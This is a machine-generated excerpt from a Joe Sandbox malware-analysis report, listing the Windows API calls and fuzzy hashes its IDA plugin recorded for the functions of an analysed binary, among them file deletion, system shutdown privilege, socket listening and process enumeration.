                                                                    • Part of subcall function 008F4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F4743,?,?,008F37AE,?), ref: 008F4770
                                                                    • Part of subcall function 00954A31: GetFileAttributesW.KERNEL32(?,0095370B), ref: 00954A32
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00953B89
                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00953BD9
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00953BEA
                                                                  • FindClose.KERNEL32(00000000), ref: 00953C01
                                                                  • FindClose.KERNEL32(00000000), ref: 00953C0A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                  • String ID: \*.*
                                                                  • API String ID: 2649000838-1173974218
                                                                  • Opcode ID: 85cc30be3b26f807c119357b78fea3da4e8264e2681762c8744fdbe6976fcc59
                                                                  • Instruction ID: 35046fe3600f009bc94813d8a48a1cae03d511d338a3120d4d8ec8aaaa021d52
                                                                  • Opcode Fuzzy Hash: 85cc30be3b26f807c119357b78fea3da4e8264e2681762c8744fdbe6976fcc59
                                                                  • Instruction Fuzzy Hash: 2E316D3200C389ABC301EB28D8A58BFB7A8BE95315F444D2DF9D5D6191EB219A0CD763
                                                                  APIs
                                                                    • Part of subcall function 009487E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094882B
                                                                    • Part of subcall function 009487E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00948858
                                                                    • Part of subcall function 009487E1: GetLastError.KERNEL32 ref: 00948865
                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 009551F9
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                  • String ID: $@$SeShutdownPrivilege
                                                                  • API String ID: 2234035333-194228
                                                                  • Opcode ID: 5433e44a94baa7baf5992fdfad9ce73c833d6eee35a3a56a8d2f2b376f5da750
                                                                  • Instruction ID: c699e440fee0d0988598157e2d78d252903b694d0d463e2750ec301cb5e5e2db
                                                                  • Opcode Fuzzy Hash: 5433e44a94baa7baf5992fdfad9ce73c833d6eee35a3a56a8d2f2b376f5da750
                                                                  • Instruction Fuzzy Hash: A2012B317A56116BF728E26A9CBAFBB729CEB05353F220821FD27E20D3D9515C088790
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009662DC
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009662EB
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00966307
                                                                  • listen.WSOCK32(00000000,00000005), ref: 00966316
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00966330
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00966344
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1279440585-0
                                                                  • Opcode ID: de97518d9d59300627050db9813c27f0caac57fed5dec3c9db06af088bc5f732
                                                                  • Instruction ID: 867d0695f26eb1c90b563ba63bc16ad85c8b06208490fee2a82b30d51ef26010
                                                                  • Opcode Fuzzy Hash: de97518d9d59300627050db9813c27f0caac57fed5dec3c9db06af088bc5f732
                                                                  • Instruction Fuzzy Hash: FE21BB326002049FCB00AF68C859F6EB7A9EF49720F148569E95AE73D1CB70AC41DB52
                                                                  APIs
                                                                    • Part of subcall function 00910DB6: std::exception::exception.LIBCMT ref: 00910DEC
                                                                    • Part of subcall function 00910DB6: __CxxThrowException@8.LIBCMT ref: 00910E01
                                                                  • _memmove.LIBCMT ref: 00940258
                                                                  • _memmove.LIBCMT ref: 0094036D
                                                                  • _memmove.LIBCMT ref: 00940414
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1300846289-0
                                                                  • Opcode ID: 91e80998b588ba2ff851c51e7ef96f6aa1fd9a4208d7b43f16834af3ae883dce
                                                                  • Instruction ID: 8e2834d057ed53674e363f534835c4dcd9062807e5b4a3072ceca0fe97987cab
                                                                  • Opcode Fuzzy Hash: 91e80998b588ba2ff851c51e7ef96f6aa1fd9a4208d7b43f16834af3ae883dce
                                                                  • Instruction Fuzzy Hash: E902AE70A00209DFCF04DF68D981ABEBBB5FF88300F558469E90ADB295EB75D950CB91
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 008F19FA
                                                                  • GetSysColor.USER32(0000000F), ref: 008F1A4E
                                                                  • SetBkColor.GDI32(?,00000000), ref: 008F1A61
                                                                    • Part of subcall function 008F1290: DefDlgProcW.USER32(?,00000020,?), ref: 008F12D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ColorProc$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 3744519093-0
                                                                  • Opcode ID: 97b543d7bd48f26ac620abc6070977c3aeca9ad3c42caa2a01a386975799a67d
                                                                  • Instruction ID: fbd4a03637ec0e32e95de2d723fc1ea510e01dfc0b3717183356667f355cd37e
                                                                  • Opcode Fuzzy Hash: 97b543d7bd48f26ac620abc6070977c3aeca9ad3c42caa2a01a386975799a67d
                                                                  • Instruction Fuzzy Hash: 0EA16AB121656CFADE28AB389C5CFBF36DCFF82759F140219F312D1196CA258D4092B2
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0095BCE6
                                                                  • _wcscmp.LIBCMT ref: 0095BD16
                                                                  • _wcscmp.LIBCMT ref: 0095BD2B
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0095BD3C
                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0095BD6C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 2387731787-0
                                                                  • Opcode ID: 6cbb92edaf938d2af027334615e25f5471cd9e1c9f0d3ee06b6298446196cf4c
                                                                  • Instruction ID: bf2990fbb9ab008c88e765b7984fcaa492f60b5535cdc30a4b822daf32f1b45b
                                                                  • Opcode Fuzzy Hash: 6cbb92edaf938d2af027334615e25f5471cd9e1c9f0d3ee06b6298446196cf4c
                                                                  • Instruction Fuzzy Hash: 3F517B756046069FD714DF29C491EAAB3F8FF49320F104529EA5ACB3A1DB30ED48CB91
                                                                  APIs
                                                                    • Part of subcall function 00967D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00967DB6
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0096679E
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009667C7
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00966800
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0096680D
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00966821
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 99427753-0
                                                                  • Opcode ID: a907dae42ab6b7d66dd3e22bb0150ab2bb040cb6f6fed36375a5c2efc6c95011
                                                                  • Instruction ID: 4a337f64492c8836c3ab44fb7eb6b9ceab5ca760476b2533d8d1dbe51079628d
                                                                  • Opcode Fuzzy Hash: a907dae42ab6b7d66dd3e22bb0150ab2bb040cb6f6fed36375a5c2efc6c95011
                                                                  • Instruction Fuzzy Hash: A041B675600214AFDB50BF788C86F7E77A8EF45754F048568FA59EB3D2CA709D008B92
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  • Opcode ID: 5ba770680495b149966c69d2c3ac50df0dfa02f71951190bb5136a9499b02078
                                                                  • Instruction ID: 4be4774a4b5fbc32ac155ddcc77eba1e694b2e2b49e271f5adac59ee945d4fcd
                                                                  • Opcode Fuzzy Hash: 5ba770680495b149966c69d2c3ac50df0dfa02f71951190bb5136a9499b02078
                                                                  • Instruction Fuzzy Hash: 6011E233314914ABDB206F26DC44B2A7B9CFF847A0B028438F84ED7261CBB09D418AA1
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009480C0
                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009480CA
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009480D9
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009480E0
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009480F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: 238dc26cd0d5cb975274b5a0c52e6b4a13f43bb43de78dc33ae9d9eab350353c
                                                                  • Instruction ID: 96856c377195b1e161a5b29c6326dd02ccbc6513c4f3a9497ef8eb0f358c983e
                                                                  • Opcode Fuzzy Hash: 238dc26cd0d5cb975274b5a0c52e6b4a13f43bb43de78dc33ae9d9eab350353c
                                                                  • Instruction Fuzzy Hash: 64F0443126C204EFDB101F65DC9DE6B3BACFF8A759F400026F549D6150CA619C41EA60
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 0095C432
                                                                  • CoCreateInstance.OLE32(00982D6C,00000000,00000001,00982BDC,?), ref: 0095C44A
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • CoUninitialize.OLE32 ref: 0095C6B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                  • String ID: .lnk
                                                                  • API String ID: 2683427295-24824748
                                                                  • Opcode ID: ab0d0addd0b0b8ce9673b0530d5596c5042bf5eed33e10ee544ff12cae5474b8
                                                                  • Instruction ID: 5ccb73e9665f372fb329655c0dbf9f4bc34e74258010b944767d937586138bde
                                                                  • Opcode Fuzzy Hash: ab0d0addd0b0b8ce9673b0530d5596c5042bf5eed33e10ee544ff12cae5474b8
                                                                  • Instruction Fuzzy Hash: BBA11A71104209AFD700EF68C891EBBB7A8FF85354F004929F695D7192DB71AA49CB62
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,008F4AD0), ref: 008F4B45
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008F4B57
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 2574300362-192647395
                                                                  • Opcode ID: 37fe8dc8f03887b7c77d5b24ee274aea56b0b75f1803450326c83a52e471eb0b
                                                                  • Instruction ID: 78b33b9367859c10e64fd157a174feb880902e629dbe391ba519719f4ff9097e
                                                                  • Opcode Fuzzy Hash: 37fe8dc8f03887b7c77d5b24ee274aea56b0b75f1803450326c83a52e471eb0b
                                                                  • Instruction Fuzzy Hash: 21D01736A28717CFD7209F72E839B1677E4EF453A5F11C87A948EE6150E670E8C0CA54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 674341424-0
                                                                  • Opcode ID: 75af97773acc1e9affee804fa5fa882d14d7f2da3adf7e5a5eff47ace391d8a4
                                                                  • Instruction ID: 6e1c5914e0225fa090e0b10a1b69b7c29944efc31e9c541f6df1f7e66c576744
                                                                  • Opcode Fuzzy Hash: 75af97773acc1e9affee804fa5fa882d14d7f2da3adf7e5a5eff47ace391d8a4
                                                                  • Instruction Fuzzy Hash: CD227B716083019FC724DF28C891B6AB7E8FF89710F10892DF59A9B291DB75E944CF92
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0096EE3D
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0096EE4B
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0096EF0B
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0096EF1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                  • String ID:
                                                                  • API String ID: 2576544623-0
                                                                  • Opcode ID: c6a73370822b2c61cbf6813f2671e627eb99056321cff8e6fdc7236a28d250bc
                                                                  • Instruction ID: b2de34a8ca004598f08f167cce9c8ece42ec43b1a0d424ab69b270cbc8a3744a
                                                                  • Opcode Fuzzy Hash: c6a73370822b2c61cbf6813f2671e627eb99056321cff8e6fdc7236a28d250bc
                                                                  • Instruction Fuzzy Hash: AB517B71508714ABD310EF28D885E6BBBE8FF98750F50482DF695D72A1EB70A904CB92
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0094E628
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: ($|
                                                                  • API String ID: 1659193697-1631851259
                                                                  • Opcode ID: 1bb777553ddb0cd29a3ba738e9642da36efe71c0ed9266a6f47c95c1c28863f4
                                                                  • Instruction ID: 0839a98cc88992210104738916a3270dbe919cdac0065fa2a52471d50f1d6c56
                                                                  • Opcode Fuzzy Hash: 1bb777553ddb0cd29a3ba738e9642da36efe71c0ed9266a6f47c95c1c28863f4
                                                                  • Instruction Fuzzy Hash: 31320575A007059FDB28CF59C481EAAB7F1FF48320B15C56EE89ADB3A1E770A941CB44
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0096180A,00000000), ref: 009623E1
                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00962418
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                  • String ID:
                                                                  • API String ID: 599397726-0
                                                                  • Opcode ID: 31894a5849e70c2a5f99fd182fbe4c7d3ff4d80c54e3c4441693a05c1adac628
                                                                  • Instruction ID: e690068419b59e254dd9ac3fa2ff6cac67e6e447cb2169f8b593d4d3f468595f
                                                                  • Opcode Fuzzy Hash: 31894a5849e70c2a5f99fd182fbe4c7d3ff4d80c54e3c4441693a05c1adac628
                                                                  • Instruction Fuzzy Hash: 1141F571A04A09BFEB10DF95DC81FFB77BCEB80714F10406AF605A6250EB759E819660
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0095B40B
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0095B465
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0095B4B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1682464887-0
                                                                  • Opcode ID: ce2f6bf8965010048ec5271fe28fecde3c0d0407add1953fb8118468ae7765ee
                                                                  • Instruction ID: bf009b8bf2673427a787ecc98ac40b75f35894a6f9f2676e8882777071075f7e
                                                                  • Opcode Fuzzy Hash: ce2f6bf8965010048ec5271fe28fecde3c0d0407add1953fb8118468ae7765ee
                                                                  • Instruction Fuzzy Hash: FE215E35A10108EFCB00EFA5D881AEDBBB8FF49310F1480A9E905EB361DB319955CB51
                                                                  APIs
                                                                    • Part of subcall function 00910DB6: std::exception::exception.LIBCMT ref: 00910DEC
                                                                    • Part of subcall function 00910DB6: __CxxThrowException@8.LIBCMT ref: 00910E01
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094882B
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00948858
                                                                  • GetLastError.KERNEL32 ref: 00948865
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1922334811-0
                                                                  • Opcode ID: fe91c794b11c40db41171e0678f5a4f84e4364a35c1313a6ab14974f540f4d84
                                                                  • Instruction ID: f31f729c07da7eef260fd2f0cdbac9a1bfe80358f99fdedb17b76c8b75167874
                                                                  • Opcode Fuzzy Hash: fe91c794b11c40db41171e0678f5a4f84e4364a35c1313a6ab14974f540f4d84
                                                                  • Instruction Fuzzy Hash: 60116DB2514309AFE728DFA4EC85D6BB7BCEB45710B20852EE45997341EA71AC808B60
                                                                  APIs
                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00948774
                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0094878B
                                                                  • FreeSid.ADVAPI32(?), ref: 0094879B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
